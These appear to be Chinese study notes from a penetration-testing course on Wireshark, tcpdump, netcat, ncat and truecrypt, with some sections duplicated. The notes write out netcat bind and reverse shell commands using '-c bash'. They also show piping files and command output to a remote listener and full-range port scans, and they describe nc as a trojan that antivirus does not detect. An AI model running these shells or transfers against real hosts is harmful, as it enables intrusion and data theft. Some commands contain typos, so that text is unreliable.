信息统计(statistics)
节点数
协议分布
包大小分布
会话连接
解码方式
专家系统
实践
抓包对比nc ncat加密与不加密的流量 用WIRESHARK抓包
nc建立连接
arp 三次握手建立tcp连接 反向arp 传输数据
ncat也一样
当抓大流量时 不适合用WIRESHARK
企业抓包
sniffer
Cace/riverbed(推荐)
Cascad pilot
信息统计(statistics)
节点数
协议分布
包大小分布
会话连接
解码方式
专家系统
实践
抓包对比nc ncat加密与不加密的流量 用WIRESHARK抓包
nc建立连接
arp 三次握手建立tcp连接 反向arp 传输数据
ncat也一样
当抓大流量时 不适合用WIRESHARK
企业抓包
sniffer
Cace/riverbed(推荐)
Cascad pilot
UDP不确认是否到达 只是发送
TCP确认到达 ack 未收到重新发 因此需要三次握手
SYN - SYN ACK - ACK
每一次的接收 然后发送 都会携带一个ack
DNS 域名解析
应用层协议
http 访问网站都会走http协议
ftp 应用层协议
自主解析 比如 如果非80端口的 http无法解析 右击解析
右击查看 数据流(http smtp pop3 ssl(比如 https))
常见的协议包
·数据包分层结构
·ARP二层层协议ARP
·SSDP三层协议IP 四层UDP
·ICMP
·IGMP
·TCP--三次握手
·DNS
·HTTP
·FTP
基本使用方法
启动
网卡
(混杂模式 可以抓到不经过该网卡的数据包 非混杂模式 只抓经过该网卡的流量)
抓包筛选器
·过滤掉干扰的数据包
·抓包筛选器(设置网卡时)
·显示筛选器(抓完包后使用)
保存和分析数据包
首选项Edit preferences
nc缺陷
nc传输的所有的数据不加密
ncat(弥补nc缺陷)包含在nmap工具包中
A:ncat ncat -c bash --allow(确定对象) 192.168.20.14 -vnl 333 --ssl(做加密)
B:ncat -nv 1.1.1.1 333 --ssl
不同操作系统nc 参数功能不仅相同
nc -h man nc
WIRESHARK
抓包嗅探协议分析
安全专家必备的技能
抓包引擎
libpcap9——Linux(抓包后0101010的那种 传给WIRESHARK后解码)
Winpcap10——Windows
解码能力
基本使用方法
启动
网卡
(混杂模式 可以抓到不经过该网卡的数据包 非混杂模式 只抓经过该网卡的流量)
抓包筛选器
·过滤掉干扰的数据包
·抓包筛选器(设置网卡时)
·显示筛选器(抓完包后使用)
保存和分析数据包
首选项Edit preferences
远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A:nc -l[ 333
B:nc 1.1.1.1 333 -c bash
注意 windows用户把bash改为cmd
3传输文件/目录
传输文件
A:nc -lp 333 > 1.mp4 打开端口 把端口的侦听到的内容输出到1.mp4
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1 连接1.1.1.1 333端口 并把1.mp4 传入到333
A B 互换打开 监听端口
B: nc -lp 333 < 2.mp4 -q 1 把2.mp4 放在端口333中等待别人来下载
传输目录(包括目录里面的所有文件)
A:tar -cvf - -music/(先把目录打包成文件 然后在nc) | nc -lp 333 -q 1
B:nc -nv 1.1.1.1.1 333 | tar -xvf -(连接 然后解包)
| 前面的输出等于后面的输入
加密传文件
A:nc -lp 333(收到文件 后 有后面的命令来解密 然后输出) | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B:mcrypt --flush -Fbq -a rijndael-256 -m ecb(将其进行加密 然后给nc) < 2.mp4 | nc -nv 1.1.1.1 333 -q 1
流媒体服务器
A:cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
端口扫描
nc -nvz(z扫描模式) 1.1.1.1 1-65535(所有端口)
nc -vnzu(加u 显示udp端口是否显示 否则是tcp端口) 1.1.1.1 1-1024
1.telnet/获取banner信息(远程连接)(作为客户端)
nc -h查看参数
nc -v显示详细的连接信息n不会域名解析 IP 端口
然后会显示状态 open等
POP3中 需要使用base64 编码
base64 内容 ctrl D 就编码了
2.传输文本信息
需要一个服务器 开放一个端口 并侦听 然后另一个服务器去连接
A:nc -l -p 4444 打开端口4444 并侦听4444端口
B:nc -nv 1.1.1.1 4444 连接A的ip的端口
连接后就可以聊天呢
用途 ls -l | nc -nv 1.1.1.1 4444 把输出的内容管道输出到本地电脑里 本机里 nc -l -p 4444 > ps.txt 把传入的信息传入到文本里
加-q x(标准的输出完成后 等x秒后就断开连接 其中x是随意指定的数字)
truecrypt
·创建加密文件
·可以创建隐藏加密空间 外层与内层密码
·标准的加密文件 加密算法 挂载后相当于一个新的硬盘 操作相似
基本工具(重要的工具)
-NETCAT,WIRESHARK TCPDUMP
NETCAT--NC简介(最好去看专业的书籍)
·小身材 大智慧
·侦听模式/传输模式
·telnet/获取banner信息(别人的端口)
·传输文本信息
·传输文件/目录
·加密传输文件
·远程控制/木马(不会被视为病毒查杀)
·加密所有流量
·流媒体服务器
·远程克隆硬盘
过程文档记录
·方便团队内部传输观看
·Dradis 用浏览器打开 可导入 导出(多格式)
·Keepnote只能导出html格式
3 TCPDUMP--抓包
NO-GUI
·抓包
·默认只抓68字节
·tcpdump -i 网卡 -s(确定抓数据包为多大) 0(数据包多大就抓多大) -w file.pcap
·tcpdump -i 网卡 tcp(显示tcp包的) port 22 抓22端口的流量
读取抓包文件
·tcpdump -r -A(以ascci码显示) -X(16进制显示) file.pcap
·显示
·tcpdump -n -r http.cap(显示数据包) | awk'{prink}'(显示第三行) | sort -u(重复的过滤)
·tcpdump -n src(源地址是这个IP) host IP -r http.cap
·tcpdump -n dst(目标地址) host IP -r http.cap
·tcpdump -n port 53 -r http.cap
·tcpdump -nX -r http.cap
·高级筛选
每一行4个字节 一个字节8位 注意从0开始的 tcp【13】 为第14个字节
·tcpdump -A(ascci) -n(不做域名解析) ‘tcp【13】(tcp字节为24)=24’-r http.cap